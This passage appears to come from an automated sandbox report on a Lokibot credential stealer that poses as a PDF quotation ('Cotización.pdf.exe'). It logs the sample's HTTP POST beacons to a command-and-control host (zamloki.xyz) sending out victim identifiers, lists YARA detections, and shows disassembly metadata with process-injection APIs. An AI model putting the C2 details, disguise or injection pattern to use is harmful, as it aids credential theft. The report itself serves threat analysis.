                                    Jul 21, 2021 17:02:44.301839113 CEST5664OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:44.606476068 CEST5664INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w4960vf%2B7tS3hmPSKolUZ2tUfC2ZL9zO9cN5DX%2BuDFdBd65bXRSr4Pldf3R8qXolok5XbQU7c9ji0mjw3UCCMQAhmyBCAbz0v3c%2FaHhY6XHENUAfXMh5HtBWyWwh7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fdedf6b4e50-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    99192.168.2.349838172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:44.910721064 CEST5665OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:44.928602934 CEST5665OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:45.186896086 CEST5666INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cthWy9waWDmEcV05Z5%2BWqaPG%2FPPr2VPw%2F8B8NqHzleg1P1QrqsCssPD0AWXex51d1PrPG9KXAsTbeqeyjPcX4H32FQXmzOHqfhS4hlpAuGc7FevvGKb9gcXXixiJkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fe2ce512c3a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 3492 Parent PID: 5612

                                    General

                                    Start time:17:01:03
                                    Start date:21/07/2021
                                    Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe'
                                    Imagebase:0x7a0000
                                    File size:1104896 bytes
                                    MD5 hash:C3412FEE75B0F8758EA9905930EC2F34
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 6088 Parent PID: 3492

                                    General

                                    Start time:17:01:44
                                    Start date:21/07/2021
                                    Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Wow64 process (32bit):false
                                    Commandline:{path}
                                    Imagebase:0x180000
                                    File size:1104896 bytes
                                    MD5 hash:C3412FEE75B0F8758EA9905930EC2F34
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 2644 Parent PID: 3492

                                    General

                                    Start time:17:01:44
                                    Start date:21/07/2021
                                    Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0xc20000
                                    File size:1104896 bytes
                                    MD5 hash:C3412FEE75B0F8758EA9905930EC2F34
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 3492 Parent PID: 5612 Cotizaci#U00f3n.pdf.exeCOMMON

                                      Executed Functions

                                      Function 071C16E7, Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: J*K{
                                      • API String ID: 0-879598089
                                      • Opcode ID: a3a3cf6869f9e182018f701ced1e69afa46b922f9d5901357817f555c396c766
                                      • Instruction ID: ac97d9899f7efd030a9687ad4e05dfc57c1d9f0e92bd9d4275efcdc1b50749fa
                                      • Opcode Fuzzy Hash: a3a3cf6869f9e182018f701ced1e69afa46b922f9d5901357817f555c396c766
                                      • Instruction Fuzzy Hash: 35F169F0D1420AEFCB08CFE5C5828EEBBB2FF99740B548559C405AB295D734AA46CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C17BE, Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: J*K{
                                      • API String ID: 0-879598089
                                      • Opcode ID: ff94bd82003d11cadc2bde10c28d3fe282d72586f458d43aba006c8a26998f2e
                                      • Instruction ID: f997e61fbe813a5332c9f4e4f18abb0d7aa8cce7f6128793b5bdbc1e3627dacf
                                      • Opcode Fuzzy Hash: ff94bd82003d11cadc2bde10c28d3fe282d72586f458d43aba006c8a26998f2e
                                      • Instruction Fuzzy Hash: 5FD16AB0D1420AEFCB08CFE5C5828AEFBB2FF99340B558559C415AB295D334DA82CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C5F38, Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 9FGP
                                      • API String ID: 0-203624819
                                      • Opcode ID: eb66e9825b4f34a902fd3dd8f124093eaf8b4ef71b5b1c73538285c891015309
                                      • Instruction ID: d4ef10186da2ab0ec649d60ae38f22d7f6dcdac9f7d54d196002452b8f530d48
                                      • Opcode Fuzzy Hash: eb66e9825b4f34a902fd3dd8f124093eaf8b4ef71b5b1c73538285c891015309
                                      • Instruction Fuzzy Hash: FBB124B4E05219CBCB08CFE9C9455DEFBF6BF99300F24C52AD414AB394E734A9428B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C5F28, Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 9FGP
                                      • API String ID: 0-203624819
                                      • Opcode ID: acd48513a23084154db7aa4f8ce7a78a82eebbcd083b74cad5348956ff44d145
                                      • Instruction ID: b265ed472f608c62969ef770621c9fb3eacedc7b1c2a837e50fb4ba86188c2fc
                                      • Opcode Fuzzy Hash: acd48513a23084154db7aa4f8ce7a78a82eebbcd083b74cad5348956ff44d145
                                      • Instruction Fuzzy Hash: BAB123B4E05219CBCB08CFE9C9415DEFBF6AF99300F24C52AD414AB394E73499428B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C0920, Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ded303cd73b9a0594b6bf869d3b5c2c621d681163ff90028125abd3a659eb36
                                      • Instruction ID: db78d43aa347a0897445d50a71b2ed6dbecf9efb0dcca1ea28835233d6f9db94
                                      • Opcode Fuzzy Hash: 1ded303cd73b9a0594b6bf869d3b5c2c621d681163ff90028125abd3a659eb36
                                      • Instruction Fuzzy Hash: 753114B1E016189BDB18CFAAD9446CEBBF7BFC9311F14C1AAD409A6354DB345A86CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C0910, Relevance: .1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a6cebfcb534a204465de7365ef395f8049932f153df4d1f43838857f9d814f6
                                      • Instruction ID: 311ca2a5477efc1aebe7894a3cd0ab4192dafb7096e38a1fd7b1a8864422716c
                                      • Opcode Fuzzy Hash: 8a6cebfcb534a204465de7365ef395f8049932f153df4d1f43838857f9d814f6
                                      • Instruction Fuzzy Hash: B021E9B1E056598BEB18CFA6C9553DEBFF3AFC9300F18C16AD408A6258DB340986CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100B680, Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0100B6F0
                                      • GetCurrentThread.KERNEL32 ref: 0100B72D
                                      • GetCurrentProcess.KERNEL32 ref: 0100B76A
                                      • GetCurrentThreadId.KERNEL32 ref: 0100B7C3
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 4defed04795f98a8f3feb4049c6080140848741829e85f6bef59ef49ec9d12f6
                                      • Instruction ID: 4c6169baf845dbfe8e27ba2d005d0f3308a7ab4319694ec308afce723fd228e2
                                      • Opcode Fuzzy Hash: 4defed04795f98a8f3feb4049c6080140848741829e85f6bef59ef49ec9d12f6
                                      • Instruction Fuzzy Hash: 3C5165B4900349CFDB55CFAAD48879EBBF1BF89308F248499E059A73A0D7345845CF62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100B690, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0100B6F0
                                      • GetCurrentThread.KERNEL32 ref: 0100B72D
                                      • GetCurrentProcess.KERNEL32 ref: 0100B76A
                                      • GetCurrentThreadId.KERNEL32 ref: 0100B7C3
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 30481b876b97aae66d7e83ba15ceca222a1d3b3dc6911eff0e9b386482770b64
                                      • Instruction ID: b5bff1ad2a5a5464da9c5499a7f63e62a9c8099605981f23afa8dac612bc2952
                                      • Opcode Fuzzy Hash: 30481b876b97aae66d7e83ba15ceca222a1d3b3dc6911eff0e9b386482770b64
                                      • Instruction Fuzzy Hash: 7C5166B4900649CFDB54CFAAD588B9EBBF1BF88304F248499E059A33A0DB345844CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01009690, Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 010098D6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 15918d353e49acbaf336ef152bc1fcfb386d44e43742f1b66ff4ce199341dfc1
                                      • Instruction ID: 26d90cbd5e8b60149b8ec81804da26bcfe9c90e0f15981ca60cb5eb9e0aa231d
                                      • Opcode Fuzzy Hash: 15918d353e49acbaf336ef152bc1fcfb386d44e43742f1b66ff4ce199341dfc1
                                      • Instruction Fuzzy Hash: C6813271A00B058FEB65DF69D0407AABBF5BF88308F00892ED59AD7B81D774E905CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CA90C, Relevance: 1.6, APIs: 1, Instructions: 145processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 071CAA6B
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 1cca077893e7296ae47e73f5754d3969c59d986f68543e6ca51428a7f4d6a44b
                                      • Instruction ID: e2b942471451174998a73f066d877acc1c2ed835ce92d1298b04dd7f894119f7
                                      • Opcode Fuzzy Hash: 1cca077893e7296ae47e73f5754d3969c59d986f68543e6ca51428a7f4d6a44b
                                      • Instruction Fuzzy Hash: C55129B1900319DFDF11CF99C880BDEBBB6BF48314F1585AAE849A7250DB309A89CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CA918, Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 071CAA6B
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 4053a4f63004f9c4f91655f495c85817a1d1fd26b6fa24e8ff677ea931d07ee9
                                      • Instruction ID: a172daa15ad15a1fabf9cd93df87a8eeaedac1138e5c25d4a6f11f0762a28547
                                      • Opcode Fuzzy Hash: 4053a4f63004f9c4f91655f495c85817a1d1fd26b6fa24e8ff677ea931d07ee9
                                      • Instruction Fuzzy Hash: 4A5109B1900319DFDF11CF99C880BDDBBB5BF48314F1584AAE908A7250DB759A89CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100FCF0, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0100FE0A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: fe2b2c7ec1edd884976b5c41878e41d15e608838850314ac827d04cc39de43ca
                                      • Instruction ID: 6807f2cf238888f9a800b518a5fcbb786f896eb14c5fd16cb2af4519961cf622
                                      • Opcode Fuzzy Hash: fe2b2c7ec1edd884976b5c41878e41d15e608838850314ac827d04cc39de43ca
                                      • Instruction Fuzzy Hash: 5151E0B1D00349AFDF15CFAAC884ADEBBF5BF48314F24812AE418AB250D7749885CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100FCF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0100FE0A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: a2ce1498eaad66e75a63f454209df1edd2168926590eed2a5776fe55776f4744
                                      • Instruction ID: a05e3f00ef6fe0f7871ff0272a08df818f8860dccc29fea1654d4070d663fada
                                      • Opcode Fuzzy Hash: a2ce1498eaad66e75a63f454209df1edd2168926590eed2a5776fe55776f4744
                                      • Instruction Fuzzy Hash: E441D0B1D003499FDF15CF9AC880ADEBBF5BF88714F24812AE818AB250D7749845CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01003E08, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01005421
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 6c70e9cf6a51bb119e61cf60cf5d8feec78053bbca5ef7990b9ccccdfcfe3db2
                                      • Instruction ID: 6611eb62f24dba2718edc2515b466d1851ccf59d1c0151833d5a64558512ba8a
                                      • Opcode Fuzzy Hash: 6c70e9cf6a51bb119e61cf60cf5d8feec78053bbca5ef7990b9ccccdfcfe3db2
                                      • Instruction Fuzzy Hash: B14104B1D00619CFDB24CFA9C884BDEBBF5BF88308F518469D408AB251DB756945CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01005369, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01005421
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 845efff121354c2a609f7abd4cd33bab3bdb14fcda8435fea064f0e5dc1b56a4
                                      • Instruction ID: 59a71c93ee35809c3ba8a157f28f36d89303995af09b3fe43b7ab3dea82f0494
                                      • Opcode Fuzzy Hash: 845efff121354c2a609f7abd4cd33bab3bdb14fcda8435fea064f0e5dc1b56a4
                                      • Instruction Fuzzy Hash: 6A41E471D00619CFDB14CFA9C884BCEBBF5BF88308F258469D448AB251DB755945CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAFD5, Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071CB065
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: f54a9ad72278723fd9c38702c9893216c5063cf0b88bd8cae1f7793ec9b171ac
                                      • Instruction ID: d613782759d1a999b8b197780c272ecc85bef26617c291529fdc40fc4cea5dff
                                      • Opcode Fuzzy Hash: f54a9ad72278723fd9c38702c9893216c5063cf0b88bd8cae1f7793ec9b171ac
                                      • Instruction Fuzzy Hash: C021D2B1900259DFDB10CFAAC885BDEBBF4FB48314F10842AE928E7250D774A954CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAFD8, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071CB065
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 20c96f2664c4703156dd1cf3dee1748374b765b9f15434a0d4327241a0e5f5a6
                                      • Instruction ID: fa81a63c774a1d9db67e7072d005d8027e36724c8fde2fcfa5f3717bc212c887
                                      • Opcode Fuzzy Hash: 20c96f2664c4703156dd1cf3dee1748374b765b9f15434a0d4327241a0e5f5a6
                                      • Instruction Fuzzy Hash: 6021E4B1900259DFDB10CF9AC885BDEFBF4FB48314F10842AE918E7250D774A954CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100B8B4, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100B93F
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: a97afa7d1a8cba7707542cce38599d4a262032dd7c5607b3a5d0ccbf22b8679c
                                      • Instruction ID: 63de5d5837cfc431016f510abcd9b6949818c4b4a3af0c369a78e0604d40ff1f
                                      • Opcode Fuzzy Hash: a97afa7d1a8cba7707542cce38599d4a262032dd7c5607b3a5d0ccbf22b8679c
                                      • Instruction Fuzzy Hash: DC21E4B5900209EFDB10CFAAD484ADEFBF8FB48324F14841AE954A7350D374A955CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAD40, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071CADC7
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 86946f493bd10ef54fc397068cefc0e8e9fd700f69e0144b2f3922e00d297e8f
                                      • Instruction ID: b9d756f3d605a29024e2fcf500702b3b9e9cb8b9086359405a146d3617816e12
                                      • Opcode Fuzzy Hash: 86946f493bd10ef54fc397068cefc0e8e9fd700f69e0144b2f3922e00d297e8f
                                      • Instruction Fuzzy Hash: 3921E2B5901259DFCB10CF9AD884ADEFBF4FF48320F10842AE958A7250D334A954DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0100B8B8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100B93F
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: d581968ea71e323b64e056e1e8c6b1d2c143932ed25a8e6f4a2fad1a3b27b6be
                                      • Instruction ID: 67346c917c4e1dafa33dfe71914778e44ca76076b0c4a27af559a96bc11f2a2b
                                      • Opcode Fuzzy Hash: d581968ea71e323b64e056e1e8c6b1d2c143932ed25a8e6f4a2fad1a3b27b6be
                                      • Instruction Fuzzy Hash: E321E2B5900209AFDB10CFAAD884ADEFBF8EB48324F14841AE954A3350D374A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAC80, Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetThreadContext.KERNELBASE(?,00000000), ref: 071CACFF
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      • Opcode ID: b13d907d2162fd42592918607985154c429a9d8cee3bb25740b9ea2c551520f7
                                      • Instruction ID: 6a7f7d921af5cda3b324a13b52dcb216d74ecfcd58c1d601e5fcd3913d82bce9
                                      • Opcode Fuzzy Hash: b13d907d2162fd42592918607985154c429a9d8cee3bb25740b9ea2c551520f7
                                      • Instruction Fuzzy Hash: E12115B190061A9FCB00CF9AC5847EEFBF4FF48624F10812AE418A7640D778A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01009AF4, Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01009951,00000800,00000000,00000000), ref: 01009B62
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.286573928.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 47926cf30b3408a283b971c9a30be26d425f418221e973c4528ea4b897e3b508
                                      • Instruction ID: e0f3b96c0f983e14a9a56645e4e027a5efb95819095675c7e52a6e4c85ef7088
                                      • Opcode Fuzzy Hash: 47926cf30b3408a283b971c9a30be26d425f418221e973c4528ea4b897e3b508
                                      • Instruction Fuzzy Hash: 142132B6D006088FDB10CF9AD444AEEFBF4EB88328F14852AD559A7241C374A946CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071CAD48, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071CADC7
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: ee7453296420c9c5f18020246cb5a8c31d4589700329c772b51f13b2e82b0b9f
